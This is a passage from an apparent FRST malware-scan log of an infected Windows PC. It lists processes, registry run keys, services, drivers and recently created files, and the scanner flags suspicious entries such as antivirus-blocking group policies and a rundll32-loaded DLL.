Update\hpwuSchd2.exe(Sony Corporation) C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe(Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe(Apple Inc.) C:\Program Files\QuickTime\QTTask.exe(Stardock Corporation) C:\Program Files\Dell\DellDock\DellDock.exe(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe(Microsoft Corporation) C:\Windows\ehome\ehtray.exe(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\iCloudServices.exe(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe(Microsoft Corporation) C:\Windows\System32\rundll32.exe(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acsagent.exe(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE(Advanced Micro Devices Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe(Glarysoft Ltd) C:\Program Files\Glary Utilities 5\Integrator.exe(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe(Microsoft Corporation) C:\Windows\System32\rundll32.exe(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe(ATI Technologies Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqste08.exe(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqbam08.exe(Hewlett-Packard) C:\Program Files\HP\Digital Imaging\bin\hpqgpc01.exe(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\APSDaemon.exe(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe(Microsoft Corporation) C:\Windows\System32\mobsync.exe(Microsoft Corporation) C:\Windows\System32\dllhost.exe(Microsoft Corporation) C:\Windows\System32\dllhost.exe(Microsoft Corporation) C:\Windows\System32\dllhost.exe(Microsoft Corporation) C:\Windows\System32\dllhost.exe(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe ==================== Registry (Whitelisted) ================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [ECenter] => C:\Dell\E-Center\EULALauncher.exe [17920 2008-02-29] ( )HKLM\...\Run: [RtHDVCpl] => C:\Windows\RtHDVCpl.exe [4706304 2008-03-06] (Realtek Semiconductor)HKLM\...\Run: [startCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [90112 2006-11-10] ()HKLM\...\Run: [dscactivate] => C:\Program Files\Dell Support Center\gs_agent\custom\dsca.exe [16384 2008-03-11] ( )HKLM\...\Run: [PCMService] => C:\Program Files\Dell\MediaDirect\PCMService.exe [132392 2008-01-14] (CyberLink Corp.)HKLM\...\Run: [AppleSyncNotifier] => C:\Program Files\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe [59240 2012-02-23] (Apple Inc.)HKLM\...\Run: [HP Software Update] => C:\Program Files\HP\HP Software Update\HPWuSchd2.exe [54840 2007-05-08] (Hewlett-Packard)HKLM\...\Run: [PMBVolumeWatcher] => C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe [599328 2010-03-24] (Sony Corporation)HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [997920 2011-06-15] (Microsoft Corporation)HKLM\...\Run: [AVG_TRAY] => C:\Program Files\AVG\AVG10\avgtray.exe [2338656 2011-09-10] (AVG Technologies CZ, s.r.o.)HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.)HKLM\...\Run: [acevents] => C:\Program Files\ActivIdentity\ActivClient\acevents.exe [153640 2009-06-03] (ActivIdentity)HKLM\...\Run: [accrdsub] => C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe [400936 2009-06-03] (ActivIdentity)HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [152392 2014-08-01] (Apple Inc.)HKLM\...\Run: [DameWare MRC Agent] => C:\Windows\dwrcs\DWRCST.exe [379752 2012-11-02] (SolarWinds)HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Malwarebytes <====== ATTENTIONHKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTIONHKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\AVAST Software <====== ATTENTIONHKLM Group Policy restriction on software: C:\Program Files\AVG <====== ATTENTIONHKLM Group Policy restriction on software: C:\Program Files\AVG <====== ATTENTIONHKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\McAfee <====== ATTENTIONHKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware <====== ATTENTIONHKLM\...\Policies\Explorer: [useDefaultTile] 0HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-20] (Microsoft Corporation)HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [Akamai NetSession Interface] => C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe [4672920 2014-04-17] (Akamai Technologies, Inc.)HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [iCloudServices] => C:\Program Files\Common Files\Apple\Internet Services\iCloudServices.exe [59720 2013-10-31] (Apple Inc.)HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [com.apple.dav.bookmarks.daemon] => C:\Program Files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe [59720 2013-10-02] (Apple Inc.)HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [ApplePhotoStreams] => C:\Program Files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [59720 2013-10-31] (Apple Inc.)HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [GUDelayStartup] => C:\Program Files\Glary Utilities 5\StartupManager.exe [37152 2014-08-17] (Glarysoft Ltd)HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [uINoteworthy] => C:\Windows\system32\rundll32.exe "C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll",DllRegisterServer <===== ATTENTIONStartup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ActivClient Agent.lnkShortcutTarget: ActivClient Agent.lnk -> C:\Program Files\ActivIdentity\ActivClient\acsagent.exe (ActivIdentity)Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnkShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Metacafe.lnkShortcutTarget: Metacafe.lnk -> C:\$RECYCLE.BIN\S-1-5-21-3726736968-409882640-1958551794-1000\MetacafeAgent.exe (No File)Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NETGEAR WNA1100 Smart Wizard.lnkShortcutTarget: NETGEAR WNA1100 Smart Wizard.lnk -> C:\Program Files\NETGEAR\WNA1100\WNA1100.exe ()Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnkShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnkShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)Startup: C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnkShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)Startup: C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnkShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)Startup: C:\Users\Rita\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnkShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)Startup: C:\Users\Rita\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnkShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)Startup: C:\Users\savas.kyriakidis\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnkShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)Startup: C:\Users\savas.kyriakidis\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnkShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)BootExecute: autocheck autochk * BootDefrag.exesasnative32 ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearchHKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0xA02BBBD1D537CF01HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-usSearchScopes: HKCU - DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)BHO: SSVHelper Class -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll (Sun Microsystems, Inc.)BHO: CBrowserHelperObject Object -> {CA6319C0-31B7-401E-A518-A07C3DB8F777} -> C:\Program Files\Dell\BAE\BAE.dll (Dell Inc.)BHO: HP Smart BHO Class -> {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} -> C:\Program Files\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll (Hewlett-Packard Co.)Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No FileDPF: {5D637FAD-E202-48D1-8F18-5B9C459BD1E3} http://www.winkflash.com/photo/loaders/ImageUploader5.cabDPF: {82E5DF24-51E8-47CD-864A-F4BD5005AA73} https://www.icloud.com/system/iCloud.cabDPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cabHandler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG10\avgpp.dll (AVG Technologies CZ, s.r.o.)Winsock: Catalog5 01 %SystemRoot%\System32\mswsock.dll [223232] (Microsoft Corporation) ATTENTION: The LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)Tcpip\Parameters: [DhcpNameServer] 192.168.2.1 66.18.32.2 66.18.32.3 FireFox:========FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\4.0.60831.0\npctrl.dll ( Microsoft Corporation)FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtensionFF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-08-06]FF HKLM\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2FF Extension: HP Smart Web Printing - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2 [2010-09-02]FF HKLM\...\Firefox\Extensions: [{1E73965B-8B48-48be-9C8D-68B920ABC1C4}] - C:\Program Files\AVG\AVG10\Firefox4FF Extension: AVG Safe Search - C:\Program Files\AVG\AVG10\Firefox4 [2011-07-10]FF HKCU\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2 Chrome: =======CHR HKLM\...\Chrome\Extension: [icmlaeflemplmjndnaapfdbbnpncnbda] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [] ========================== Services (Whitelisted) ================= (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R2 ac.sharedstore; C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe [207400 2009-06-03] (ActivIdentity)S3 AVG Security Toolbar Service; C:\Program Files\AVG\AVG10\Toolbar\ToolbarBroker.exe [167264 2011-11-10] ()R2 avgfws; C:\Program Files\AVG\AVG10\avgfws.exe [2708024 2011-03-09] (AVG Technologies CZ, s.r.o.)S2 AVGIDSAgent; C:\Program Files\AVG\AVG10\Identity Protection\Agent\Bin\AVGIDSAgent.exe [7390560 2011-08-18] (AVG Technologies CZ, s.r.o.)R2 avgwd; C:\Program Files\AVG\AVG10\avgwdsvc.exe [269520 2011-02-08] (AVG Technologies CZ, s.r.o.)R2 DockLoginService; C:\Program Files\Dell\DellDock\DockLogin.exe [161048 2008-04-28] (Stardock Corporation)R2 dwmrcs; C:\Windows\dwrcs\DWRCS.EXE [705384 2012-11-02] (SolarWinds)R3 hpqcxs08; C:\Program Files\HP\Digital Imaging\bin\hpqcxs08.dll [217088 2008-10-16] (Hewlett-Packard Co.) [File not signed]R2 hpqddsvc; C:\Program Files\HP\Digital Imaging\bin\hpqddsvc.dll [135168 2008-10-16] (Hewlett-Packard Co.) [File not signed]R2 HPSLPSVC; C:\Program Files\HP\Digital Imaging\bin\HPSLPSVC32.DLL [634880 2008-10-16] (Hewlett-Packard Co.) [File not signed]S3 jswpsapi; C:\Program Files\NETGEAR\WNA1100\jswpsapi.exe [960992 2010-03-22] (Atheros Communications, Inc.)R2 lxbl_device; C:\Windows\system32\lxblcoms.exe [537520 2007-04-20] ( )R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [44032 2008-07-18] (Hewlett-Packard) [File not signed]S3 NisSrv; c:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe [208944 2011-04-27] (Microsoft Corporation)R2 PassThru Service; C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe [87040 2012-03-23] () [File not signed]R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [53760 2008-07-18] (Hewlett-Packard) [File not signed]R2 WSWNA1100; C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe [266240 2010-08-04] () [File not signed]S2 vToolbarUpdater; C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\9.0.1\ToolbarUpdater.exe [X] ==================== Drivers (Whitelisted) ==================== (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) S3 athur; C:\Windows\System32\DRIVERS\athur.sys [1439744 2010-10-10] (Atheros Communications, Inc.)R0 AVGIDSHX; C:\Windows\System32\DRIVERS\avgidshx.sys [147736 2014-06-17] (AVG Technologies CZ, s.r.o.)R1 Avgldx86; C:\Windows\System32\DRIVERS\avgldx86.sys [248656 2011-01-07] (AVG Technologies CZ, s.r.o.)R1 Avgmfx86; C:\Windows\System32\DRIVERS\avgmfx86.sys [34896 2011-03-01] (AVG Technologies CZ, s.r.o.)R0 Avgrkx86; C:\Windows\System32\DRIVERS\avgrkx86.sys [32592 2011-03-16] (AVG Technologies CZ, s.r.o.)R1 Avgtdix; C:\Windows\System32\DRIVERS\avgtdix.sys [297168 2011-04-05] (AVG Technologies CZ, s.r.o.)R0 BootDefragDriver; C:\Windows\System32\drivers\BootDefragDriver.sys [16064 2014-07-18] (Glarysoft Ltd)S3 gfiark; C:\Windows\System32\drivers\gfiark.sys [43368 2013-05-23] (ThreatTrack Security)R1 GUBootStartup; C:\Windows\System32\drivers\GUBootStartup.sys [17216 2014-08-14] (Glarysoft Ltd)R1 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [165648 2011-04-18] (Microsoft Corporation)S3 MpNWMon; C:\Windows\System32\DRIVERS\MpNWMon.sys [43392 2011-04-18] (Microsoft Corporation)R2 RtNdPt60; C:\Windows\System32\DRIVERS\RtNdPt60.sys [27648 2008-03-06] (Windows ® Codename Longhorn DDK provider)R0 SCMNdisP; C:\Windows\System32\DRIVERS\scmndisp.sys [21728 2007-01-19] (Windows ® Codename Longhorn DDK provider)S3 USBAAPL; C:\Windows\System32\Drivers\usbaapl.sys [42496 2011-08-02] (Apple, Inc.) [File not signed]U5 AppMgmt; C:\Windows\system32\svchost.exe [21504 2008-01-20] (Microsoft Corporation)S1 AVGIDSDriver; system32\DRIVERS\avgidsdriverx.sys [X]S1 AVGIDSShim; system32\DRIVERS\avgidsshimx.sys [X]R3 catchme; \??\C:\Users\SAVAS~1.KYR\AppData\Local\Temp\catchme.sys [X]S3 IpInIp; system32\DRIVERS\ipinip.sys [X]S1 MpKslb9ee2848; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{BFB5F758-88DD-40A2-8570-9299F94880E8}\MpKslb9ee2848.sys [X]S1 MpKslbb89cfa8; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{A306A4ED-0116-4B29-AE29-DC65EC41A044}\MpKslbb89cfa8.sys [X]S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]S3 SWDUMon; system32\DRIVERS\SWDUMon.sys [X]S3 TfNetMon; \??\C:\Windows\system32\drivers\TfNetMon.sys [X]U3 mbr; \??\C:\ComboFix\mbr.sys [X] ==================== NetSvcs (Whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.) ==================== One Month Created Files and Folders ======== (If an entry is included in the fixlist, the file\folder will be moved.) 2014-08-25 11:10 - 2014-08-25 11:10 - 00043997 _____ () C:\ComboFix.txt2014-08-25 10:53 - 2014-08-25 11:10 - 00000000 ____D () C:\ComboFix2014-08-23 16:54 - 2014-08-25 13:41 - 00000000 ____D () C:\FRST2014-08-23 16:30 - 2014-08-25 09:35 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys2014-08-23 16:30 - 2014-08-25 08:26 - 00000901 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk2014-08-23 16:30 - 2014-08-25 08:26 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware2014-08-23 16:30 - 2014-08-25 08:26 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware2014-08-23 16:30 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys2014-08-23 16:30 - 2014-05-12 07:25 - 00074456 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys2014-08-23 16:30 - 2014-05-12 07:25 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys2014-08-23 12:25 - 2011-06-26 02:45 - 00256000 _____ () C:\Windows\PEV.exe2014-08-23 12:25 - 2010-11-07 13:20 - 00208896 _____ () C:\Windows\MBR.exe2014-08-23 12:25 - 2009-04-20 00:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe2014-08-23 12:25 - 2000-08-30 20:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe2014-08-23 12:25 - 2000-08-30 20:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe2014-08-23 12:25 - 2000-08-30 20:00 - 00098816 _____ () C:\Windows\sed.exe2014-08-23 12:25 - 2000-08-30 20:00 - 00080412 _____ () C:\Windows\grep.exe2014-08-23 12:25 - 2000-08-30 20:00 - 00068096 _____ () C:\Windows\zip.exe2014-08-23 12:12 - 2014-08-23 12:12 - 00007836 _____ () C:\Users\savas.kyriakidis\Desktop\reg.txt2014-08-23 12:03 - 2014-08-23 12:03 - 00009362 _____ () C:\Users\savas.kyriakidis\Desktop\safer.txt2014-08-23 11:51 - 2014-08-23 11:53 - 00000000 ____D () C:\AdwCleaner2014-08-23 11:49 - 2014-08-23 11:49 - 00007919 _____ () C:\Users\savas.kyriakidis\Desktop\JRT.txt2014-08-23 11:42 - 2014-08-23 11:42 - 00000000 ____D () C:\Windows\ERUNT2014-08-22 17:06 - 2013-09-04 14:57 - 00024040 _____ (ThreatTrack Security) C:\Windows\system32\Drivers\gfiutil.sys2014-08-22 17:06 - 2013-05-23 08:39 - 00043368 _____ (ThreatTrack Security) C:\Windows\system32\Drivers\gfiark.sys2014-08-22 17:05 - 2014-08-22 21:40 - 00000000 ____D () C:\VIPRERESCUE2014-08-22 17:05 - 2014-08-22 17:05 - 00000000 ____D () C:\EEK2014-08-22 16:12 - 2014-08-25 10:47 - 00040016 _____ () C:\Windows\PFRO.log2014-08-22 15:52 - 2014-08-25 11:10 - 00000000 ____D () C:\Qoobox2014-08-22 14:32 - 2014-08-22 14:32 - 00000000 ____D () C:\Users\savas.kyriakidis\Documents\ProcAlyzer Dumps2014-08-22 14:00 - 2014-08-23 16:48 - 00000000 ____D () C:\ProgramData\HitmanPro2014-08-22 13:41 - 2014-08-22 13:54 - 00000000 ____D () C:\Windows\dwrcs2014-08-22 13:41 - 2014-08-22 13:41 - 00000000 ____D () C:\ProgramData\DameWare Development2014-08-22 13:25 - 2014-08-25 13:39 - 00001564 _____ () C:\Windows\setupact.log2014-08-22 13:25 - 2014-08-22 13:25 - 00000000 _____ () C:\Windows\setuperr.log2014-08-20 19:17 - 2014-08-20 19:17 - 00319456 _____ (Microsoft Corporation) C:\Windows\DIFxAPI.dll2014-08-20 18:46 - 2014-08-20 18:46 - 00000666 _____ () C:\Toolbars.dat2014-08-20 18:12 - 2014-08-19 18:12 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys2014-08-20 18:08 - 2014-08-20 18:08 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy2014-08-19 23:07 - 2014-08-19 23:07 - 00000000 ____D () C:\ProgramData\GlarySoft2014-08-17 16:29 - 2014-08-17 16:29 - 04763288 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4745.exe2014-08-17 15:54 - 2014-08-17 15:54 - 04462440 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4335_welcomecmp.exe2014-08-16 17:57 - 2014-08-17 17:23 - 00000000 ____D () C:\ProgramData\AVG20142014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\MFAData2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Avg20142014-08-16 17:04 - 2014-08-16 17:05 - 04755832 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_free_stb_all_2014_4744_cnet.exe2014-08-16 12:05 - 2014-08-16 12:05 - 00000000 ____D () C:\ProgramData\SlimWare Utilities Inc2014-08-16 12:04 - 2014-08-16 12:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Downloaded Installers2014-08-15 20:57 - 2014-08-16 12:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc2014-08-15 20:56 - 2014-08-16 09:22 - 00000000 ____D () C:\Program Files\DriverUpdate2014-08-15 20:56 - 2014-08-15 20:56 - 00000000 ____D () C:\Users\Public\Documents\Downloaded Installers2014-08-15 13:32 - 2014-08-15 13:32 - 06534584 _____ (Systweak Software ) C:\Users\savas.kyriakidis\Downloads\PCDiagnosisProTPSSetup.exe2014-08-15 13:23 - 2014-08-15 13:23 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (3).exe2014-08-15 13:12 - 2014-08-15 13:13 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (2).exe2014-08-15 13:11 - 2014-08-15 13:11 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (1).exe2014-08-15 13:04 - 2014-08-15 13:21 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\TeamViewer2014-08-15 13:02 - 2014-08-15 13:02 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en.exe2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803173445318587.exe2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803172000784607.exe2014-08-15 11:12 - 2014-08-15 11:13 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012 (1).exe2014-08-15 11:11 - 2014-08-15 11:12 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012.exe2014-08-14 19:24 - 2014-08-14 19:24 - 00000000 ___HD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup-Disabled2014-08-14 18:20 - 2014-08-25 10:49 - 00000342 _____ () C:\Windows\Tasks\GlaryInitialize 5.job2014-08-14 18:20 - 2014-08-20 23:44 - 00000891 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk2014-08-14 18:20 - 2014-08-20 23:44 - 00000879 _____ () C:\Users\Public\Desktop\Glary Utilities 5.lnk2014-08-14 18:20 - 2014-08-14 18:20 - 00017216 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\GUBootStartup.sys2014-08-14 18:20 - 2014-08-14 18:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 52014-08-14 18:19 - 2014-08-25 10:49 - 00000000 ____D () C:\Program Files\Glary Utilities 52014-08-14 18:19 - 2014-08-23 11:16 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\DiskDefrag2014-08-14 18:19 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\GlarySoft2014-08-14 18:19 - 2014-08-04 03:06 - 00101664 _____ (Glarysoft Ltd) C:\Windows\system32\BootDefrag.exe2014-08-14 18:19 - 2014-07-18 03:11 - 00016064 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\BootDefragDriver.sys2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (5).exe2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (4).exe2014-08-14 18:15 - 2014-08-14 18:16 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (3).exe2014-08-14 18:15 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (2).exe2014-08-14 18:14 - 2014-08-14 18:14 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (1).exe2014-08-14 18:13 - 2014-08-14 18:13 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup.exe2014-08-14 17:37 - 2014-08-14 17:40 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809374825884190.exe2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809372042763201.exe2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809371092783465.exe2014-08-13 21:31 - 